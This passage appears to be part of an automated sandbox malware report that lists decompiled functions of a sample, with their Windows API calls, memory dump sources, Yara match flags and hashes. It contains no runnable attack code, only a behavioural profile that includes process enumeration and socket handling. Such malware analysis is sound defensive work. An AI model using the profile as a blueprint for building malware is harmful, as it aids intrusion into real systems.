                                                                                      • Part of subcall function 02719788: DecodePointer.KERNEL32(?,?,?,027171DF,00000000,?,00000000), ref: 02719799
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 027171E3
                                                                                    • ExitThread.KERNEL32 ref: 027171EA
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 027171F0
                                                                                    • __freefls@4.LIBCMT ref: 02717210
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                    • String ID:
                                                                                    • API String ID: 2383549826-0
                                                                                    • Opcode ID: 71bfe619023cb83c0f4fe0403428de41075618d05d37eb205f477f63edf16712
                                                                                    • Instruction ID: e9637b00c39f66ae5a24bbf16c011d1878818ddbfea878ddfc8c28e65164a459
                                                                                    • Opcode Fuzzy Hash: 71bfe619023cb83c0f4fe0403428de41075618d05d37eb205f477f63edf16712
                                                                                    • Instruction Fuzzy Hash: 5FF09074400241EBC71DBF79CD5C94EBBAAAF88344325CC58EA048B201DB34D8478FA0
                                                                                    Function 0307F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0307F9CA
                                                                                      • Part of subcall function 03083CA0: TlsGetValue.KERNEL32(00000000,03083DF9,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000), ref: 03083CA9
                                                                                      • Part of subcall function 03083CA0: DecodePointer.KERNEL32(?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000,?,03083F06,0000000D), ref: 03083CBB
                                                                                      • Part of subcall function 03083CA0: TlsSetValue.KERNEL32(00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000,?,03083F06), ref: 03083CCA
                                                                                    • ___fls_getvalue@4.LIBCMT ref: 0307F9D5
                                                                                      • Part of subcall function 03083C80: TlsGetValue.KERNEL32(?,?,0307F9DA,00000000), ref: 03083C8E
                                                                                    • ___fls_setvalue@8.LIBCMT ref: 0307F9E8
                                                                                      • Part of subcall function 03083CD4: DecodePointer.KERNEL32(?,?,?,0307F9ED,00000000,?,00000000), ref: 03083CE5
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 0307F9F1
                                                                                    • ExitThread.KERNEL32 ref: 0307F9F8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0307F9FE
                                                                                    • __freefls@4.LIBCMT ref: 0307FA1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                    • String ID:
                                                                                    • API String ID: 2383549826-0
                                                                                    • Opcode ID: faa950d4b3153849c36832d66fe64be02d1d3efb8d6408d80de76cff74a68b6b
                                                                                    • Instruction ID: c16ebc416d66efe79c662b10074bc7049fa79a910ed2f7e914f5ffd5891b9ca3
                                                                                    • Opcode Fuzzy Hash: faa950d4b3153849c36832d66fe64be02d1d3efb8d6408d80de76cff74a68b6b
                                                                                    • Instruction Fuzzy Hash: FEF0967CA03305BBC708FF70C50888E7FACBFC56403108498E9458F201DA34D441C795
                                                                                    Function 03076050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0307607C
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 03076088
                                                                                    • Process32FirstW.KERNEL32 ref: 030760B9
                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0307610F
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03076116
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                    • String ID:
                                                                                    • API String ID: 2526126748-0
                                                                                    • Opcode ID: 6060387a09e0ec22400d647f753233fd3ab6a539cff5a6b190893ea9be770dd4
                                                                                    • Instruction ID: c79537503d9171b9a69e04e019517a9f849ef8a3f65b8813bb1f1b1c5af25214
                                                                                    • Opcode Fuzzy Hash: 6060387a09e0ec22400d647f753233fd3ab6a539cff5a6b190893ea9be770dd4
                                                                                    • Instruction Fuzzy Hash: 0021B731A0611DABDB20FF68DC59BEAB3A9FF15310F044699DD0A97280EB369A10C694
                                                                                    Function 027132E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 027132F1
                                                                                    • Sleep.KERNEL32(00000258), ref: 027132FE
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 02713306
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02713312
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0271331A
                                                                                    • Sleep.KERNEL32(0000012C), ref: 0271332B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 3137405945-0
                                                                                    • Opcode ID: 2f2f752fac218e5ccc4c2d2db805611f154d147b3dbd07da9a4444b604a551aa
                                                                                    • Instruction ID: 808f15d4097d4d6b41ff05c7f758f97652b5abcba19b3815073c2d6af2b615af
                                                                                    • Opcode Fuzzy Hash: 2f2f752fac218e5ccc4c2d2db805611f154d147b3dbd07da9a4444b604a551aa
                                                                                    • Instruction Fuzzy Hash: EEF082722443046BD634ABA9DC84E56F3A8AF85330B218B09F221872D0CAB0E8058BA0
                                                                                    Function 03076690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0307669B
                                                                                    • CoCreateInstance.OLE32(030946FC,00000000,00000001,0309471C,?,?,?,?,?,?,?,?,?,?,0307588A), ref: 030766B2
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0307674C
                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0307588A), ref: 0307677D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                    • String ID: FriendlyName
                                                                                    • API String ID: 841178590-3623505368
                                                                                    • Opcode ID: 0d8b21a7ef0d6668cae749d85a94cf2159e49e22f9dbc4d2cd43fea4e841776f
                                                                                    • Instruction ID: 90b397c1c35e7e4923d44533e0ef34dedd9f45e5c53da1570327052172db1997
                                                                                    • Opcode Fuzzy Hash: 0d8b21a7ef0d6668cae749d85a94cf2159e49e22f9dbc4d2cd43fea4e841776f
                                                                                    • Instruction Fuzzy Hash: 82316875B0160AAFDB00DB99CC80EAEB7BDEF88704F148589F505EB250DB71E902CB60
                                                                                    Function 0307F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 0307F721
                                                                                      • Part of subcall function 0307F673: __FF_MSGBANNER.LIBCMT ref: 0307F68C
                                                                                      • Part of subcall function 0307F673: __NMSG_WRITE.LIBCMT ref: 0307F693
                                                                                      • Part of subcall function 0307F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76), ref: 0307F6B8
                                                                                    • std::exception::exception.LIBCMT ref: 0307F756
                                                                                    • std::exception::exception.LIBCMT ref: 0307F770
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0307F781
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                    • String ID: bad allocation
                                                                                    • API String ID: 615853336-2104205924
                                                                                    • Opcode ID: df3477999bdbd7a91fc4b556c1d240d4bfcc92aabfcb57f3e9eaa2f953e80916
                                                                                    • Instruction ID: d0ecb7b5999da5a1afaf0be3ff560b128d86b9db88ea4029146ff250be1df97b
                                                                                    • Opcode Fuzzy Hash: df3477999bdbd7a91fc4b556c1d240d4bfcc92aabfcb57f3e9eaa2f953e80916
                                                                                    • Instruction Fuzzy Hash: 8EF0FF75D0330FABEF04FB54EC24ADE7BE8AF80218F54001AE814EA191DB70CA05DB98
                                                                                    Function 10011A40 Relevance: 7.6, APIs: 5, Instructions: 100fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
                                                                                    • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011A7B
                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 10011ACC
                                                                                    • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011AFD
                                                                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                    • String ID:
                                                                                    • API String ID: 1074265955-0
                                                                                    • Opcode ID: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                    • Instruction ID: f3b0000acd429ac5cb95c2efd876261dd8ef2d3ed187a2a6324a5f7f02af080d
                                                                                    • Opcode Fuzzy Hash: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                    • Instruction Fuzzy Hash: 9E41B075A04249EFDB48CF98C885ADEBBB5FF88314F10C559E92A9B250D774EA80CF50
                                                                                    Function 10015FE6 Relevance: 7.5, APIs: 5, Instructions: 38COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FEE
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FFB
                                                                                    • _CxxThrowException.VCRUNTIME140(?,10019CBC), ref: 100166FE
                                                                                    • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 1001670D
                                                                                    • _CxxThrowException.VCRUNTIME140(?,10019D9C), ref: 1001671B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                    • String ID:
                                                                                    • API String ID: 1722040371-0
                                                                                    • Opcode ID: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                    • Instruction ID: 08eecf3aab68b4969477acf4f8a3a2caa643f1c7ff8f01e52dc4bc7ddf13aa92
                                                                                    • Opcode Fuzzy Hash: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                    • Instruction Fuzzy Hash: 56F0543880420DB78F04E6B9EC169ED777CEB04290F604125FA689D4D5EB71F6DA85D4
                                                                                    Function 02712D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02712D3C
                                                                                    • CancelIo.KERNEL32(?), ref: 02712D46
                                                                                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02712D4F
                                                                                    • closesocket.WS2_32(?), ref: 02712D59
                                                                                    • SetEvent.KERNEL32(00000001), ref: 02712D63
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 1486965892-0
                                                                                    • Opcode ID: 8f18371ad4a1ae414f1fd93289b76f0e700f7c31e25c797abaa6f4a32c244744
                                                                                    • Instruction ID: 1f6a8ac5d6b603e0a9997760857c52381f2c3e27f0317507139b7740fcff50b0
                                                                                    • Opcode Fuzzy Hash: 8f18371ad4a1ae414f1fd93289b76f0e700f7c31e25c797abaa6f4a32c244744
                                                                                    • Instruction Fuzzy Hash: 44F04F76640700ABD3349F64DD49F6677B8FB49B11F508A5DFA8297680C7B0B9088BA0
                                                                                    Function 03072D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03072D5C
                                                                                    • CancelIo.KERNEL32(?), ref: 03072D66
                                                                                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03072D6F
                                                                                    • closesocket.WS2_32(?), ref: 03072D79
                                                                                    • SetEvent.KERNEL32(00000001), ref: 03072D83
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 1486965892-0
                                                                                    • Opcode ID: c8c02214cf27a0cef491a9037e4537b15f8c8d6d6595a1d30027fee08223de59
                                                                                    • Instruction ID: b745d779923c8616f7b2c57506feb32f2fa0a3f97449b38b39b75d0655a26846
                                                                                    • Opcode Fuzzy Hash: c8c02214cf27a0cef491a9037e4537b15f8c8d6d6595a1d30027fee08223de59
                                                                                    • Instruction Fuzzy Hash: BFF08C76101308BBC224AF58DD09F6673FCFB48B11F004A0DF69696684C6B4B9088BA4
                                                                                    Function 10013A70 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10017B76,000000FF,?,10013642,?), ref: 10013A90
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10017B76,000000FF,?,10013642), ref: 10013AAB
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,10013642,?), ref: 10013ADF
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 10013B57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                    • String ID:
                                                                                    • API String ID: 1566052064-0
                                                                                    • Opcode ID: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                    • Instruction ID: 47359edd55c6cc15742bff4ced4580a4001c133a1fe49908c7c5117e5c40c52a
                                                                                    • Opcode Fuzzy Hash: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                    • Instruction Fuzzy Hash: DD3141B4D00259DFDB04DF94D981BEEBBB4FF48310F208659E52667391DB34AA84CBA1
                                                                                    Function 02716F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 02716F31
                                                                                      • Part of subcall function 02716E83: __FF_MSGBANNER.LIBCMT ref: 02716E9C
                                                                                      • Part of subcall function 02716E83: __NMSG_WRITE.LIBCMT ref: 02716EA3
                                                                                      • Part of subcall function 02716E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F), ref: 02716EC8
                                                                                    • std::exception::exception.LIBCMT ref: 02716F66
                                                                                    • std::exception::exception.LIBCMT ref: 02716F80
                                                                                    • __CxxThrowException@8.LIBCMT ref: 02716F91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                    • String ID:
                                                                                    • API String ID: 615853336-0
                                                                                    • Opcode ID: 20b50069ef97e46a977e9b1d5ff9c7366010ebf0d5fc9b9a536df40a3f049f47
                                                                                    • Instruction ID: 61f8c5b22b2a5836da15edb9112e5b625116b118c00d91f74ba21b9c5ecbbd2c
                                                                                    • Opcode Fuzzy Hash: 20b50069ef97e46a977e9b1d5ff9c7366010ebf0d5fc9b9a536df40a3f049f47
                                                                                    • Instruction Fuzzy Hash: B2F0FC32900119AAEF15EBADDD15AAE7FBFAF01718F15442DE415A60D0DFB0CA48CF51
                                                                                    Function 03073160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0307316B
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 03073183
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0307322F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 4033114805-0
                                                                                    • Opcode ID: 1b007608519319a505f1124c491d038f6137c1e4928193c9047105be1ab3302d
                                                                                    • Instruction ID: 6f502b7b0675949b9a7d3ab88cfb90e8f7622a84ea1e37469337f37f44d6c728
                                                                                    • Opcode Fuzzy Hash: 1b007608519319a505f1124c491d038f6137c1e4928193c9047105be1ab3302d
                                                                                    • Instruction Fuzzy Hash: 2D319174602605AFD718DF69C584A6AB3E8FF84714B10C59DE81ACB654D731F842CBD8
                                                                                    Function 10012F80 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 10012FBA
                                                                                    • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000000), ref: 10012FE7
                                                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000040,00000022,?), ref: 10013068
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 2185338108-0
                                                                                    • Opcode ID: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                    • Instruction ID: 106bc35cbdd57d80b480a718a0c65df66589e39bca71049decacc3f2370ba628
                                                                                    • Opcode Fuzzy Hash: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                    • Instruction Fuzzy Hash: AB313CB4A0021ADFDB04CF98CD91BAEB7B5FF48704F108658E916AB391C771AA41CB91
                                                                                    Function 027111B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __floor_pentium4.LIBCMT ref: 027111E9
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02711226
                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02711255
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree__floor_pentium4
                                                                                    • String ID:
                                                                                    • API String ID: 2605973128-0
                                                                                    • Opcode ID: 800f04e2a647f2cc76e3a2b2049e37b89ad0bfbdbbd3c2eea562019d1f357251
                                                                                    • Instruction ID: ecf892221013ccca0684a75918463ed43f8e7d488edfc6c59e776d062285f101
                                                                                    • Opcode Fuzzy Hash: 800f04e2a647f2cc76e3a2b2049e37b89ad0bfbdbbd3c2eea562019d1f357251
